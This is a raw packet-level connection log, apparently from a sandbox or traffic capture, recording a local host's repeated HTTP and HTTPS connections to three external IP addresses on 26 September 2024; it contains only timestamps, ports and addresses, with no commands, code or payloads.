                                              Sep 26, 2024 11:33:24.736021042 CEST4970580192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:24.737513065 CEST4970980192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:24.740935087 CEST8049705132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:24.741245985 CEST4970580192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:24.742392063 CEST8049709132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:24.742501020 CEST4970980192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:24.742583990 CEST4970980192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:24.747339010 CEST8049709132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:25.416522980 CEST8049709132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:25.418514967 CEST49710443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:25.418562889 CEST44349710188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:25.418704033 CEST49710443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:25.419020891 CEST49710443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:25.419039965 CEST44349710188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:25.465209007 CEST4970980192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:25.878254890 CEST44349710188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:25.880582094 CEST49710443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:25.880598068 CEST44349710188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:26.027142048 CEST44349710188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:26.027235985 CEST44349710188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:26.027287960 CEST49710443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:26.027900934 CEST49710443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:26.033988953 CEST4971180192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:26.038793087 CEST8049711132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:26.038918018 CEST4971180192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:26.038990021 CEST4971180192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:26.043804884 CEST8049711132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:26.711504936 CEST8049711132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:26.712918997 CEST49712443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:26.712966919 CEST44349712188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:26.713052034 CEST49712443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:26.713299990 CEST49712443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:26.713318110 CEST44349712188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:26.762056112 CEST4971180192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:27.180033922 CEST44349712188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:27.182137966 CEST49712443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:27.182173967 CEST44349712188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:27.318866014 CEST44349712188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:27.318924904 CEST44349712188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:27.319116116 CEST49712443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:27.319525957 CEST49712443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:27.323533058 CEST4971180192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:27.324750900 CEST4971380192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:27.329056978 CEST8049711132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:27.329124928 CEST4971180192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:27.329518080 CEST8049713132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:27.329593897 CEST4971380192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:27.329714060 CEST4971380192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:27.334554911 CEST8049713132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:28.383428097 CEST4971480192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:28.808664083 CEST8049713132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:28.808722019 CEST8049713132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:28.808727980 CEST8049713132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:28.808830976 CEST4971380192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:28.808856964 CEST4971380192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:28.809999943 CEST49715443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:28.810038090 CEST44349715188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:28.810106993 CEST49715443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:28.810388088 CEST49715443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:28.810405016 CEST44349715188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:28.810717106 CEST8049714132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:28.810954094 CEST4971480192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:28.811773062 CEST4971480192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:28.816565037 CEST8049714132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:29.268584013 CEST44349715188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:29.270373106 CEST49715443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:29.270401955 CEST44349715188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:29.394588947 CEST44349715188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:29.394714117 CEST44349715188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:29.394778967 CEST49715443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:29.395414114 CEST49715443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:29.399092913 CEST4971380192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:29.400162935 CEST4971680192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:29.404222012 CEST8049713132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:29.404285908 CEST4971380192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:29.404934883 CEST8049716132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:29.405052900 CEST4971680192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:29.405134916 CEST4971680192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:29.409923077 CEST8049716132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:29.475547075 CEST8049714132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:29.478965044 CEST4971480192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:29.484013081 CEST8049714132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:29.683826923 CEST8049714132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:29.720104933 CEST49717443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:29.720148087 CEST44349717188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:29.720246077 CEST49717443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:29.724514961 CEST49717443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:29.724531889 CEST44349717188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:29.730777979 CEST4971480192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:30.089086056 CEST8049716132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:30.092871904 CEST49718443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:30.092924118 CEST44349718188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:30.093041897 CEST49718443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:30.093276024 CEST49718443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:30.093291044 CEST44349718188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:30.137049913 CEST4971680192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:30.183527946 CEST44349717188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:30.183687925 CEST49717443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:30.185915947 CEST49717443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:30.185923100 CEST44349717188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:30.186219931 CEST44349717188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:30.230815887 CEST49717443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:30.242119074 CEST49717443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:30.283447981 CEST44349717188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:30.352703094 CEST44349717188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:30.352874994 CEST44349717188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:30.352950096 CEST49717443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:30.355632067 CEST49717443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:30.360580921 CEST4971480192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:30.365906954 CEST8049714132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:30.559767008 CEST44349718188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:30.561570883 CEST49718443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:30.561605930 CEST44349718188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:30.564913034 CEST8049714132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:30.567018986 CEST49719443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:30.567063093 CEST44349719188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:30.567121983 CEST49719443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:30.567353964 CEST49719443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:30.567363024 CEST44349719188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:30.605752945 CEST4971480192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:30.731605053 CEST44349718188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:30.731868029 CEST44349718188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:30.731972933 CEST49718443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:30.732332945 CEST49718443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:30.736061096 CEST4971680192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:30.737020016 CEST4972080192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:30.741231918 CEST8049716132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:30.741287947 CEST4971680192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:30.741919994 CEST8049720132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:30.741978884 CEST4972080192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:30.742078066 CEST4972080192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:30.746829987 CEST8049720132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:31.066611052 CEST44349719188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:31.068795919 CEST49719443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:31.068823099 CEST44349719188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:31.198803902 CEST44349719188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:31.198909998 CEST44349719188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:31.198993921 CEST49719443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:31.199639082 CEST49719443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:31.202884912 CEST4971480192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:31.204165936 CEST4972180192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:31.209001064 CEST8049721132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:31.209090948 CEST4972180192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:31.209203005 CEST4972180192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:31.209203959 CEST8049714132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:31.209259987 CEST4971480192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:31.214739084 CEST8049721132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:31.427967072 CEST8049720132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:31.429518938 CEST49722443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:31.429568052 CEST44349722188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:31.429641962 CEST49722443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:31.429954052 CEST49722443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:31.429966927 CEST44349722188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:31.480798006 CEST4972080192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:31.888994932 CEST8049721132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:31.891412020 CEST49723443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:31.891438007 CEST44349723188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:31.891556025 CEST49723443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:31.891987085 CEST49723443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:31.891998053 CEST44349723188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:31.906693935 CEST44349722188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:31.915637016 CEST49722443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:31.915663958 CEST44349722188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:31.933901072 CEST4972180192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:32.052640915 CEST44349722188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:32.052757025 CEST44349722188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:32.052862883 CEST49722443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:32.053359985 CEST49722443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:32.056802988 CEST4972080192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:32.057780981 CEST4972480192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:32.062700987 CEST8049724132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:32.063091993 CEST8049720132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:32.063189983 CEST4972080192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:32.063292980 CEST4972480192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:32.063292980 CEST4972480192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:32.068150043 CEST8049724132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:32.347373009 CEST44349723188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:32.349261045 CEST49723443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:32.349286079 CEST44349723188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:32.491106987 CEST44349723188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:32.491355896 CEST44349723188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:32.491496086 CEST49723443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:32.492131948 CEST49723443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:32.496701956 CEST4972580192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:32.501560926 CEST8049725132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:32.501683950 CEST4972580192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:32.501794100 CEST4972580192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:32.506524086 CEST8049725132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:32.728061914 CEST8049724132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:32.729160070 CEST49726443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:32.729198933 CEST44349726188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:32.729259968 CEST49726443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:32.729520082 CEST49726443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:32.729535103 CEST44349726188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:32.777714014 CEST4972480192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:33.184525013 CEST8049725132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:33.185904980 CEST49728443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:33.185930014 CEST44349728188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:33.186028004 CEST49728443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:33.186315060 CEST49728443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:33.186326981 CEST44349728188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:33.194319010 CEST44349726188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:33.195949078 CEST49726443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:33.195976019 CEST44349726188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:33.230822086 CEST4972580192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:33.345112085 CEST44349726188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:33.345217943 CEST44349726188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:33.345267057 CEST49726443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:33.345686913 CEST49726443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:33.644355059 CEST44349728188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:33.649720907 CEST49728443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:33.649734974 CEST44349728188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:33.782980919 CEST44349728188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:33.783072948 CEST44349728188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:33.783135891 CEST49728443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:33.783811092 CEST49728443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:33.786952019 CEST4972580192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:33.787563086 CEST4972980192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:33.792022943 CEST8049725132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:33.792361975 CEST8049729132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:33.792418003 CEST4972580192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:33.792443991 CEST4972980192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:33.792538881 CEST4972980192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:33.797307014 CEST8049729132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:34.467854023 CEST8049729132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:34.469387054 CEST49731443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:34.469419003 CEST44349731188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:34.469482899 CEST49731443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:34.469851017 CEST49731443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:34.469867945 CEST44349731188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:34.512031078 CEST4972980192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:34.938013077 CEST44349731188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:34.940138102 CEST49731443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:34.940160036 CEST44349731188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:35.068270922 CEST44349731188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:35.068363905 CEST44349731188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:35.068434954 CEST49731443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:35.068979979 CEST49731443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:35.073678970 CEST4972980192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:35.075134039 CEST4973480192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:35.078855991 CEST8049729132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:35.078910112 CEST4972980192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:35.079880953 CEST8049734132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:35.079936028 CEST4973480192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:35.080065012 CEST4973480192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:35.084775925 CEST8049734132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:35.749371052 CEST8049734132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:35.750746965 CEST49735443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:35.750811100 CEST44349735188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:35.750900030 CEST49735443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:35.751430035 CEST49735443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:35.751456976 CEST44349735188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:35.793421030 CEST4973480192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:36.217080116 CEST44349735188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:36.226562977 CEST49735443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:36.226603031 CEST44349735188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:36.365284920 CEST44349735188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:36.365392923 CEST44349735188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:36.371608973 CEST49735443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:36.432085037 CEST49735443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:36.470916033 CEST4973680192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:36.475711107 CEST8049736132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:36.475783110 CEST4973680192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:36.488157988 CEST4973680192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:36.494035959 CEST8049736132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:36.718913078 CEST4973480192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:36.724754095 CEST8049734132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:36.724837065 CEST4973480192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:37.184925079 CEST8049736132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:37.186294079 CEST49737443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:37.186347008 CEST44349737188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:37.186405897 CEST49737443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:37.186670065 CEST49737443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:37.186683893 CEST44349737188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:37.230779886 CEST4973680192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:37.662470102 CEST44349737188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:37.664263010 CEST49737443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:37.664284945 CEST44349737188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:37.789577007 CEST44349737188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:37.789671898 CEST44349737188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:37.789777040 CEST49737443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:37.790313959 CEST49737443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:37.793627977 CEST4973680192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:37.795103073 CEST4973880192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:37.798671961 CEST8049736132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:37.798734903 CEST4973680192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:37.799906015 CEST8049738132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:37.800014973 CEST4973880192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:37.800132036 CEST4973880192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:37.804831982 CEST8049738132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:38.472773075 CEST8049738132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:38.474232912 CEST49739443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:38.474267006 CEST44349739188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:38.474570990 CEST49739443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:38.474670887 CEST49739443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:38.474679947 CEST44349739188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:38.527668953 CEST4973880192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:38.932815075 CEST44349739188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:38.936233044 CEST49739443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:38.936252117 CEST44349739188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:39.081638098 CEST44349739188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:39.081748009 CEST44349739188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:39.081897974 CEST49739443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:39.094594002 CEST49739443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:39.588902950 CEST4972480192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:39.595204115 CEST8049724132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:39.595376015 CEST4972480192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:39.600778103 CEST49740443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:33:39.600809097 CEST44349740149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:33:39.600966930 CEST49740443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:33:39.601397038 CEST49740443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:33:39.601408958 CEST44349740149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:33:40.216125965 CEST44349740149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:33:40.216286898 CEST49740443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:33:40.219394922 CEST49740443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:33:40.219404936 CEST44349740149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:33:40.219913006 CEST44349740149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:33:40.229444027 CEST49740443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:33:40.275402069 CEST44349740149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:33:40.275518894 CEST49740443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:33:40.275525093 CEST44349740149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:33:40.754498005 CEST44349740149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:33:40.754580021 CEST44349740149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:33:40.754646063 CEST49740443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:33:40.755124092 CEST49740443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:33:47.958570957 CEST4972180192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:47.958945036 CEST4973880192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:49.977364063 CEST49745443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:33:49.977422953 CEST44349745149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:33:49.977503061 CEST49745443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:33:49.978038073 CEST49745443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:33:49.978058100 CEST44349745149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:33:50.587483883 CEST44349745149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:33:50.589035034 CEST49745443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:33:50.589068890 CEST44349745149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:33:50.589134932 CEST49745443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:33:50.589148998 CEST44349745149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:33:51.413666964 CEST44349745149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:33:51.413773060 CEST44349745149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:33:51.413850069 CEST49745443192.168.2.10149.154.167.220
